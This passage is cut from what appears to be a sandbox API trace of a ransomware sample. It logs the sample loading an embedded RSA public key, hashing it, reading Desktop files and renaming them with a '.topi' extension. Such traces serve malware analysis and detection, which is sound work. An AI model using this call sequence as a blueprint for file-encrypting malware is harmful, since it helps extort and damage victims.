lpNumberOfBytesRead=0x9ccfb70*=0x10a3, lpOverlapped=0x0) returned 1 [0094.523] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.523] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.523] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.523] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.523] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.524] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.524] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.524] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.524] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.524] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.524] GetLastError () returned 0x0 [0094.524] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.524] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.524] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.524] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.525] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.525] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.525] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10a0) returned 0x99f15a8 [0094.525] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.525] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3a48 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9048 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3b68 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9060 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9090 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90a8 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.525] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.525] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9090 | out: hHeap=0x680000) returned 1 [0094.525] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90a8 | out: hHeap=0x680000) returned 1 [0094.525] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.525] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.525] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d90a8 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9090 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90a8 | out: hHeap=0x680000) returned 1 [0094.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9090 | out: hHeap=0x680000) returned 1 [0094.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.526] GetCurrentThreadId () returned 0x8c4 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1a60 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.527] GetCurrentThreadId () returned 0x8c4 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9090 [0094.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0094.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90a8 [0094.528] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.528] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9078 [0094.528] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.528] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.528] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.528] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mDpwW.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mdpww.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mDpwW.png.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mdpww.png.topi")) returned 1 [0094.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.529] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.531] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x823b2a30, ftCreationTime.dwHighDateTime=0x1d5bbc3, ftLastAccessTime.dwLowDateTime=0x696989c0, ftLastAccessTime.dwHighDateTime=0x1d5be6b, ftLastWriteTime.dwLowDateTime=0x696989c0, ftLastWriteTime.dwHighDateTime=0x1d5be6b, nFileSizeHigh=0x0, nFileSizeLow=0x1680d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O-_yybE0jRAzBusLRG.rtf", cAlternateFileName="O-_YYB~1.RTF")) returned 1 [0094.531] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O-_yybE0jRAzBusLRG.rtf") returned=".rtf" [0094.531] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O-_yybE0jRAzBusLRG.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o-_yybe0jrazbuslrg.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.531] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=92173) returned 1 [0094.531] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.534] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x167e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.534] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.535] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0094.536] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.536] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.536] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.536] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.536] GetLastError () returned 0x0 [0094.536] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.536] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0094.536] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.536] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.536] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.537] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.537] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.537] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.537] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.537] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x16810) returned 0x9a06a00 [0094.537] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.537] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.537] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.537] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.537] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.537] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.537] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3b68 [0094.537] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9060 [0094.537] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3bb0 [0094.537] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9078 [0094.537] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90a8 [0094.537] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.537] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90c0 [0094.538] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.538] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.538] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.538] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.538] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90a8 | out: hHeap=0x680000) returned 1 [0094.538] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90c0 | out: hHeap=0x680000) returned 1 [0094.538] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.538] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.538] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.538] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.538] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0094.538] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d90c0 [0094.538] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.538] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d90a8 [0094.538] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0094.538] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.538] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.538] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.538] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.538] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.538] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.538] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.538] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.538] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90c0 | out: hHeap=0x680000) returned 1 [0094.538] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.538] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90a8 | out: hHeap=0x680000) returned 1 [0094.538] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.539] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.539] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.539] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.539] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.539] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.539] GetCurrentThreadId () returned 0x8c4 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1af0 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.539] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.539] GetCurrentThreadId () returned 0x8c4 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.539] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.539] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.539] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.539] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.539] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.539] HeapFree (in: hHeap=0x680000, dwFlags=0x0, 